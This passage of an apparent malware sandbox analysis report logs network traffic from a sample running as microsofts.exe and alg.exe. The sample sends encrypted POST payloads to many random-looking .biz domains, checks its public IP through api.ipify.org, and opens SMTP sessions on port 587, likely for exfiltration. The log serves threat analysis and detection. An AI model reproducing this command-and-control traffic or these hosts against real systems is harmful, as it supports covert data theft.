                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=c415c52a22a7b5b67c8944959f9122e6|173.254.250.76|1730822678|1730822678|0|1|0; path=/; domain=.bghjpy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              142192.168.2.5598173.254.94.185801816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:38.105509996 CET345OUTPOST /ow HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: ocsvqjg.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:38.105577946 CET828OUTData Raw: 2b 63 94 22 06 e0 2f 5c 30 03 00 00 92 c9 8f a1 d4 9c 8e ad 44 c1 fa df 7e 60 14 0c 59 27 6e 50 ea b9 80 17 f3 d5 be 8f aa 71 36 f1 4f de 58 de 13 20 6c 40 72 97 34 d4 72 d5 8a 07 78 d9 8c 19 99 c7 42 8f 01 ae 10 cb fc 12 32 28 f9 36 d7 55 70 1f
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: +c"/\0D~`Y'nPq6OX l@r4rxB2(6UpL[kfjZk>&}E'_\[Kk(^pRzf:r~D|v]. {VP[;_zd7Y-G8D,}np[-{ ~@x
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:39.070704937 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:04:38 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=74b94d0340b26f3c5cd991536953c446|173.254.250.76|1730822678|1730822678|0|1|0; path=/; domain=.ocsvqjg.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              143192.168.2.55982018.208.156.248801492C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:38.823153019 CET360OUTPOST /hbbreaeoihjkosw HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: damcprvgv.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:38.823175907 CET778OUTData Raw: 55 2d a8 a0 33 f4 6e 3e fe 02 00 00 c8 9e 3c 17 dd ec 16 3b ad f8 f6 b3 2f 28 5b db 49 8f 1c e5 13 2c f1 b1 fe b0 54 53 a0 3c 4e 8e a0 19 4d e2 95 74 a1 5d 76 c7 b8 9c 24 30 93 e8 92 28 76 d5 2e 59 7b e6 1d 09 10 8a d4 4f ae d5 4a 97 28 0e 47 37
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: U-3n><;/([I,TS<NMt]v$0(v.Y{OJ(G7)VYE[Vn#rjGWf2[]5cpq'mHN{Ls\)UIm%n2B00y!('Y~~`@K=$=jk_m6+a6O7Wt1g@d=3m
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:39.490765095 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:04:39 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=170b1049700e172231c5e3f610d79481|173.254.250.76|1730822679|1730822679|0|1|0; path=/; domain=.damcprvgv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              144192.168.2.55982154.244.188.177801816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:39.102952003 CET345OUTPOST /kaok HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: ywffr.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:39.103009939 CET828OUTData Raw: b3 35 b0 ac 1f 85 43 a7 30 03 00 00 49 e6 db d7 4b 5b de 30 39 1e fe d1 12 56 92 68 bd db 24 b4 5f e8 76 ff 15 b2 76 45 7c 48 96 8d 7d 02 b1 24 ea 05 d1 7d 6d d2 89 ec 46 79 03 74 2e 63 f6 8b bf 9f cb ec 07 9f 2d 6b cc 1b 41 49 16 ff 1b ff 7b 09
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 5C0IK[09Vh$_vvE|H}$}mFyt.c-kAI{t4$}spgAQ;<ewiRO0gIc*mn"}uZkQgw< v*oUj+-]'<06:4GFa
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:39.934623003 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:04:39 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=968a67c2a094ade1998c79b272e4b098|173.254.250.76|1730822679|1730822679|0|1|0; path=/; domain=.ywffr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              145192.168.2.55982254.244.188.177801816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:40.156209946 CET353OUTPOST /gcbuytwgypg HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: ecxbwt.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:40.159065008 CET828OUTData Raw: 3a 19 6a da cf d1 1a 83 30 03 00 00 4d 66 d6 95 23 ed b8 2c 66 e8 42 b7 99 7d 4b 8e 21 b3 6a ab 9e bd 82 f1 71 19 3c 7b c3 27 88 22 a6 70 41 2e ab 4f 02 20 22 19 c2 4a 5d 64 84 56 4d 50 39 44 ae 83 34 13 dd 5b 74 96 5b 1f 67 74 11 8e 98 5b f6 59
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: :j0Mf#,fB}K!jq<{'"pA.O "J]dVMP9D4[t[gt[Y>)l{k)ef:tHtPAF'JLFHrCk9LbfZ33vb>X|zOO7u8GRVucg1`Z!vNV#0P/PV52vY
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:40.989425898 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:04:40 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=19f38410194ec0b0736287dccea597a3|173.254.250.76|1730822680|1730822680|0|1|0; path=/; domain=.ecxbwt.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              146192.168.2.5598233.254.94.185801492C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:40.448261976 CET345OUTPOST /cm HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: ocsvqjg.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:40.448261976 CET778OUTData Raw: 27 ff 21 2e 5a cb cc 38 fe 02 00 00 0e 09 54 8f a1 d2 fe c4 36 3a 98 df b2 07 42 83 d0 d9 3f 31 2f a4 a6 1b 29 3d cc 7c f4 58 d3 77 08 70 f8 6f a7 76 b5 d2 cf 3e e9 2c 45 6d 5b de 90 74 60 58 34 bb 00 04 2f 67 48 af da 6a ef df 4c 5c 60 c8 8a 66
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: '!.Z8T6:B?1/)=|Xwpov>,Em[t`X4/gHjL\`fT$;L3UY<3CSuSd/9II_8A/kfdz"3R|'%d oj#]/Qry#9dm8[HQxE08d5FMjoldlhZUSf$#u
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:41.376957893 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:04:41 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=316f53102cdc4d3dea258c81b6d21cf8|173.254.250.76|1730822681|1730822681|0|1|0; path=/; domain=.ocsvqjg.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              147192.168.2.55982418.246.231.120801816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:41.022072077 CET355OUTPOST /iuaudncacnnpxx HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: pectx.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:41.022097111 CET828OUTData Raw: 67 53 15 f5 d0 f9 bf 5b 30 03 00 00 36 ff f8 56 06 07 4e 48 b1 d3 c1 b3 17 1a e7 0a 7d 2b d5 14 d2 05 7a 21 08 6e 0f 85 64 97 b0 f8 4c d7 1b 62 66 fd a1 12 0a e5 04 00 29 13 eb 2b c8 33 e1 18 e7 d0 8b ac d0 6a cc a4 8b 42 5a d4 89 8d d9 a4 69 61
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: gS[06VNH}+z!ndLbf)+3jBZia?;o6cK.DPVUR;q.Fe<S#Rg8PtG4|IPW~<LJ}a$PO;"P!Gm{0Wnymh]ix{pcBp
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:41.863279104 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:04:41 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=308e7dfd6f81f3f38a0cd20fd06a81cb|173.254.250.76|1730822681|1730822681|0|1|0; path=/; domain=.pectx.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              148192.168.2.55982654.244.188.177801492C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:41.785294056 CET351OUTPOST /biwgwfhxqj HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: ywffr.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:41.785413980 CET778OUTData Raw: c8 52 1f 69 ac f0 aa db fe 02 00 00 c7 4e c5 37 2f a8 36 ec e2 e0 1c 38 84 cb 65 0f d0 8f c9 87 f7 a6 d0 72 15 f5 9c e6 18 c2 e4 38 76 ae b3 18 a2 b4 6e 65 60 ff 39 f6 a8 7a 6c d2 46 f6 19 e6 6c 48 c8 26 93 1f 55 7c 87 b5 95 cc 7e 89 d8 d2 1d 07
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: RiN7/68er8vne`9zlFlH&U|~d[dkRl>$^.l.^~1C=;B5<oY?!fWg>OwUF~ABaaEcFU"l6t=KWw+F
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:42.626332045 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:04:42 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=3aa263268d136981ad4fe6eec3d46f0b|173.254.250.76|1730822682|1730822682|0|1|0; path=/; domain=.ywffr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              149192.168.2.56199318.208.156.248801816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:42.522381067 CET352OUTPOST /dgclnsuj HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: zyiexezl.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:42.522428989 CET828OUTData Raw: 65 2f 23 80 2b 94 0e b0 30 03 00 00 46 92 35 3d c8 59 d8 5a c8 09 3c 8e 78 78 53 18 6a 59 b6 99 6a 3c 14 5a 4e db ec ef af 43 de 23 6b ac da 86 e1 ab b3 5c cf 08 ff e8 9a 96 b2 79 06 54 89 da 97 94 86 04 c7 13 3d 9c 85 8e ba 11 68 3f e3 10 20 c7
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: e/#+0F5=YZ<xxSjYj<ZNC#k\yT=h? 0kfD\4v{aX$%`s82U1'_7OJ`C$K[L)m2E<pbB7+zfw?vi/o|&WK2}LBh
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:43.183725119 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:04:43 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=b1838f91566a73df58e489d9510b4511|173.254.250.76|1730822683|1730822683|0|1|0; path=/; domain=.zyiexezl.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              HTTPS Proxied Packets

                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              0192.168.2.549704172.67.74.1524431816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              2024-11-05 16:02:51 UTC155OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                                                                                                                                                                                                                                                                                                                                              Host: api.ipify.org
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              2024-11-05 16:02:52 UTC399INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:02:52 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 14
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                                                              CF-RAY: 8dde1212f98f6c38-DFW
                                                                                                                                                                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1782&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2817&recv_bytes=769&delivery_rate=1618781&cwnd=252&unsent_bytes=0&cid=18a3b16331b93128&ts=353&x=0"
                                                                                                                                                                                                                                                                                                                                                                                                              2024-11-05 16:02:52 UTC14INData Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 173.254.250.76


                                                                                                                                                                                                                                                                                                                                                                                                              SMTP Packets

                                                                                                                                                                                                                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:55.403208017 CET5874971151.195.88.199192.168.2.5220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 05 Nov 2024 16:02:55 +0000
                                                                                                                                                                                                                                                                                                                                                                                                              220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                                                                                                                                                                                                                                                                                                              220 and/or bulk e-mail.
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:55.403467894 CET49711587192.168.2.551.195.88.199EHLO 141700
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:55.647495985 CET5874971151.195.88.199192.168.2.5250-s82.gocheapweb.com Hello 141700 [173.254.250.76]
                                                                                                                                                                                                                                                                                                                                                                                                              250-SIZE 52428800
                                                                                                                                                                                                                                                                                                                                                                                                              250-8BITMIME
                                                                                                                                                                                                                                                                                                                                                                                                              250-PIPELINING
                                                                                                                                                                                                                                                                                                                                                                                                              250-PIPECONNECT
                                                                                                                                                                                                                                                                                                                                                                                                              250-STARTTLS
                                                                                                                                                                                                                                                                                                                                                                                                              250 HELP
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:55.647650957 CET49711587192.168.2.551.195.88.199STARTTLS
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:55.891474962 CET5874971151.195.88.199192.168.2.5220 TLS go ahead
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:59.881762981 CET5875940051.195.88.199192.168.2.5220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 05 Nov 2024 16:02:59 +0000
                                                                                                                                                                                                                                                                                                                                                                                                              220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                                                                                                                                                                                                                                                                                                              220 and/or bulk e-mail.
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:59.881983995 CET59400587192.168.2.551.195.88.199EHLO 141700
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:00.124954939 CET5875940051.195.88.199192.168.2.5250-s82.gocheapweb.com Hello 141700 [173.254.250.76]
                                                                                                                                                                                                                                                                                                                                                                                                              250-SIZE 52428800
                                                                                                                                                                                                                                                                                                                                                                                                              250-8BITMIME
                                                                                                                                                                                                                                                                                                                                                                                                              250-PIPELINING
                                                                                                                                                                                                                                                                                                                                                                                                              250-PIPECONNECT
                                                                                                                                                                                                                                                                                                                                                                                                              250-STARTTLS
                                                                                                                                                                                                                                                                                                                                                                                                              250 HELP
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:00.125657082 CET59400587192.168.2.551.195.88.199STARTTLS
